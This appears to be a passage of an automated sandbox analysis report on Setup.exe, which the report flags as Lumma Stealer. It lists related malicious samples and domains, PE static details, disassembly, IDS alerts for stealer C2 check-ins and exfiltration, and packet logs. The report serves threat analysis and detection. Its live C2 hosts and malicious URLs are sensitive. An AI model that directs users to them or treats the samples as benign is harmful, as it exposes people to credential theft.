                                                                                    • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                    PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.ssrnoremt-rise.sbs/3jsc/
                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • filetransfer.io/data-package/zWkbOqX7/download
                                                                                    http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                    • kklk16.bsyo45ksda.top/favicon.ico
                                                                                    gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                    • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                    Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                    • gmtagency.online/api/check
                                                                                    185.161.251.21Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                            Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                    @Setup.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      cegu.shopActive_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 185.161.251.21
                                                                                                      Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 185.161.251.21
                                                                                                      locketsashayz.click#Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.97.3
                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.57.27
                                                                                                      Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 172.67.158.190

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      CLOUDFLARENETUSqnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.219.133
                                                                                                      Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.157.254
                                                                                                      yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.92.91
                                                                                                      Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 172.67.198.102
                                                                                                      eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 104.21.38.84
                                                                                                      GqjiKlwarV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 172.67.220.198
                                                                                                      1znAXdPcM5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 104.21.38.84
                                                                                                      YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 104.21.38.84
                                                                                                      https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                                                                      • 104.17.24.14
                                                                                                      http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.13.60
                                                                                                      NTLGBActive_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 185.161.251.21
                                                                                                      Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      kwari.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 80.4.160.37
                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 185.161.251.21
                                                                                                      botx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 82.31.53.184

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      a0e9f5d64349fb13191bc781f81f42e1qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.97.3
                                                                                                      • 185.161.251.21
                                                                                                      Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.97.3
                                                                                                      • 185.161.251.21
                                                                                                      yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.97.3
                                                                                                      • 185.161.251.21
                                                                                                      Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      • 185.161.251.21
                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.97.3
                                                                                                      • 185.161.251.21
                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.97.3
                                                                                                      • 185.161.251.21
                                                                                                      PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.97.3
                                                                                                      • 185.161.251.21
                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.97.3
                                                                                                      • 185.161.251.21
                                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.97.3
                                                                                                      • 185.161.251.21
                                                                                                      Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.97.3
                                                                                                      • 185.161.251.21

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      No created / dropped files found

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):0.3892449133522304
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:Setup.exe
                                                                                                      File size:74'880'677 bytes
                                                                                                      MD5:abda8cea9c2d8bc35847d4d189f61f2e
                                                                                                      SHA1:ce38f933a30778130b53792109531056dfe7c03c
                                                                                                      SHA256:844b0fdfa66fd6d10179b74ae064c30624581a833bf1eb759e03fd2c664bae03
                                                                                                      SHA512:054036d0f81216efb7e0469abf62cbb3cdd06406b6a25778d6a1557bf8774f7f27d97e5bb9513b54a4f9a7cd8da1cab3e8bf2630e686f71454c0ff54f566cab4
                                                                                                      SSDEEP:12288:c9YadW8cfnpp2pd9VvvCbs492tkIMi88hmXF8hMvW+I8uwqPwc7X2BoA/yW93BnY:MdW88nTb92LMX8oXF8hBgqYcJ
                                                                                                      TLSH:90F70832D720A9F0578B44DFC522DAE9D5BE6B03132298F7514B39C7E98B4D8433AC69
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=(JeyI$6yI$6yI$6p1.6iI$6+! 7uI$6+!'7}I$6+!!7fI$6+!%7}I$6.-%7pI$6yI%6.I$6. 7cI$6. -7sI$6. .6xI$6. &7xI$6RichyI$6...............

                                                                                                      File Icon

                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4267ce
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x66BAEAF9 [Tue Aug 13 05:11:21 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:1027691d74412499ffdeec8b7ed717af

                                                                                                      Authenticode Signature

                                                                                                      Signature Valid:false
                                                                                                      Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                      Error Number:-2146869232
                                                                                                      Not Before, Not After
                                                                                                      • 15/12/2020 21:24:20 02/12/2021 21:24:20
                                                                                                      Subject Chain
                                                                                                      • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                      Version:3
                                                                                                      Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                      Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                      Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                      Serial:33000003DFFB6AE3F427ECB6A30000000003DF

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      call 00007F75E8F03E6Dh
                                                                                                      jmp 00007F75E8F03599h
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      push 00000000h
                                                                                                      call dword ptr [0042908Ch]
                                                                                                      push dword ptr [ebp+08h]
                                                                                                      call dword ptr [00429088h]
                                                                                                      push C0000409h
                                                                                                      call dword ptr [00429090h]
                                                                                                      push eax
                                                                                                      call dword ptr [00429094h]
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 00000324h
                                                                                                      push 00000017h
                                                                                                      call 00007F75E8F04010h
                                                                                                      test eax, eax
                                                                                                      je 00007F75E8F03727h
                                                                                                      push 00000002h
                                                                                                      pop ecx
                                                                                                      int 29h
                                                                                                      mov dword ptr [0042F678h], eax
                                                                                                      mov dword ptr [0042F674h], ecx
                                                                                                      mov dword ptr [0042F670h], edx
                                                                                                      mov dword ptr [0042F66Ch], ebx
                                                                                                      mov dword ptr [0042F668h], esi
                                                                                                      mov dword ptr [0042F664h], edi
                                                                                                      mov word ptr [0042F690h], ss
                                                                                                      mov word ptr [0042F684h], cs
                                                                                                      mov word ptr [0042F660h], ds
                                                                                                      mov word ptr [0042F65Ch], es
                                                                                                      mov word ptr [0042F658h], fs
                                                                                                      mov word ptr [0042F654h], gs
                                                                                                      pushfd
                                                                                                      pop dword ptr [0042F688h]
                                                                                                      mov eax, dword ptr [ebp+00h]
                                                                                                      mov dword ptr [0042F67Ch], eax
                                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                                      mov dword ptr [0042F680h], eax
                                                                                                      lea eax, dword ptr [ebp+08h]
                                                                                                      mov dword ptr [0042F68Ch], eax
                                                                                                      mov eax, dword ptr [ebp-00000324h]
                                                                                                      mov dword ptr [0042F5C8h], 00010001h

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2c8240x12c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x310000x1e0.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x47674d50x21d0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000x140c.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x2acc00x70.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x2add00x18.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ad300x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x290000x240.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x274810x2760047f72ae360dd3c78303465b05e680715False0.49032118055555557data6.585884608495068IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x290000x465c0x4800ed312862ecd77389c22fa4661daddd30False0.3819986979166667data4.747279151971027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x2e0000x21280x160015ecf71cb8ad22f220fe3a08232e5b97False0.3643465909090909data4.901400366248305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0x310000x1e00x200ad7b78e84f1d02fc883315380c423021False0.529296875data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x320000x520000x52000eab2e80fdb41a271c56495e0eface1a1False0.6910043111661586data7.576542253916384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_MANIFEST0x310600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnmapViewOfFile, CreateFileMappingA, MapViewOfFile, CreateEventA, GetExitCodeThread, SetEvent, ResetEvent, Sleep, CreateToolhelp32Snapshot, Process32Next, WaitForMultipleObjects, GetModuleFileNameA, GetPrivateProfileIntA, LoadLibraryA, GetProcAddress, FreeLibrary, InitializeCriticalSection, GetModuleFileNameW, CreateProcessW, GetExitCodeProcess, GetTickCount, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, QueryPerformanceCounter, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, WaitForSingleObject, CloseHandle, CreateThread, ReleaseMutex, CreateMutexA, MultiByteToWideChar, SetErrorMode
                                                                                                      USER32.dllFindWindowExA, LoadIconA, LoadCursorA, RegisterClassExA, CreateWindowExA, ShowWindow, UpdateWindow, GetMessageA, TranslateMessage, DispatchMessageA, DestroyWindow, PostQuitMessage, DefWindowProcA, SendMessageA, PostMessageA
                                                                                                      GDI32.dllGetStockObject
                                                                                                      ADVAPI32.dllRegCloseKey, RegCreateKeyExW, RegOpenKeyExW, RegSetValueExW
                                                                                                      MSVCP140.dll?_Xout_of_range@std@@YAXPBD@Z, ?_Xlength_error@std@@YAXPBD@Z
                                                                                                      VCRUNTIME140.dllmemmove, _except_handler4_common, _CxxThrowException, __std_exception_destroy, __std_exception_copy, memcpy, memset, wcsrchr, longjmp, _purecall, __CxxFrameHandler3, _setjmp3
                                                                                                      api-ms-win-crt-runtime-l1-1-0.dll_crt_atexit, _initialize_onexit_table, _cexit, _configure_narrow_argv, _set_app_type, _register_onexit_function, _get_initial_narrow_environment, _initterm, _initterm_e, _exit, _register_thread_local_exe_atexit_callback, __p___argc, __p___argv, _c_exit, _initialize_narrow_environment, _invalid_parameter_noinfo, exit, terminate, _controlfp_s, _errno, _invalid_parameter_noinfo_noreturn, _seh_filter_exe
                                                                                                      api-ms-win-crt-stdio-l1-1-0.dll__p__commode, fwrite, __stdio_common_vsscanf, ftell, fseek, __stdio_common_vsprintf, _wfopen_s, __stdio_common_vsprintf_s, __stdio_common_vswprintf_s, fclose, __acrt_iob_func, _set_fmode, __stdio_common_vfprintf, fread_s
                                                                                                      api-ms-win-crt-filesystem-l1-1-0.dll_splitpath_s, _wsplitpath_s
                                                                                                      api-ms-win-crt-string-l1-1-0.dllstrncmp, _strnicmp, toupper, strncpy, _wcsicmp
                                                                                                      api-ms-win-crt-environment-l1-1-0.dllgetenv
                                                                                                      api-ms-win-crt-heap-l1-1-0.dll_callnewh, free, malloc, _set_new_mode
                                                                                                      api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                                                      api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2025-01-01T16:56:21.916765+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:22.676192+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:22.676192+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:23.166077+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:23.640646+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:23.640646+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:24.615969+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:25.800459+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:31.060448+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:33.202102+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:34.766559+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:35.522155+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449742188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:36.458976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:38.632283+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:39.103074+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744188.114.97.3443TCP
                                                                                                      2025-01-01T16:56:39.907939+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745185.161.251.21443TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jan 1, 2025 16:56:21.441757917 CET49730443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:21.441796064 CET44349730188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:21.442115068 CET49730443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:21.444853067 CET49730443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:21.444871902 CET44349730188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:21.916558981 CET44349730188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:21.916764975 CET49730443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:21.920741081 CET49730443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:21.920764923 CET44349730188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:21.921097040 CET44349730188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:21.970078945 CET49730443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:21.970118999 CET49730443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:21.970231056 CET44349730188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:22.676179886 CET44349730188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:22.676264048 CET44349730188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:22.676429033 CET49730443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:22.678301096 CET49730443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:22.678323030 CET44349730188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:22.688311100 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:22.688358068 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:22.688431978 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:22.688901901 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:22.688913107 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.165998936 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.166076899 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.167455912 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.167467117 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.167730093 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.168962002 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.168996096 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.169044018 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.640625954 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.640708923 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.640743971 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.640765905 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.640778065 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.640800953 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.640819073 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.640836954 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.640892029 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.640897989 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.641078949 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.641122103 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.641127110 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.645314932 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.645345926 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.645363092 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.645370007 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.645417929 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.731071949 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.731132030 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.731158972 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.731184006 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.731209040 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.731256008 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.767720938 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.767838001 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.767895937 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.768784046 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.768810987 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:23.768825054 CET49731443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:23.768830061 CET44349731188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:24.155690908 CET49732443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:24.155740976 CET44349732188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:24.156992912 CET49732443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:24.160866976 CET49732443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:24.160883904 CET44349732188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:24.615832090 CET44349732188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:24.615968943 CET49732443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:24.618133068 CET49732443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:24.618143082 CET44349732188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:24.618347883 CET44349732188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:24.619719982 CET49732443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:24.619719982 CET49732443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:24.619754076 CET44349732188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:24.619857073 CET49732443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:24.619863033 CET44349732188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:25.248749018 CET44349732188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:25.248827934 CET44349732188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:25.248886108 CET49732443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.249126911 CET49732443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.249147892 CET44349732188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:25.342849970 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.342890978 CET44349735188.114.97.3192.168.2.4
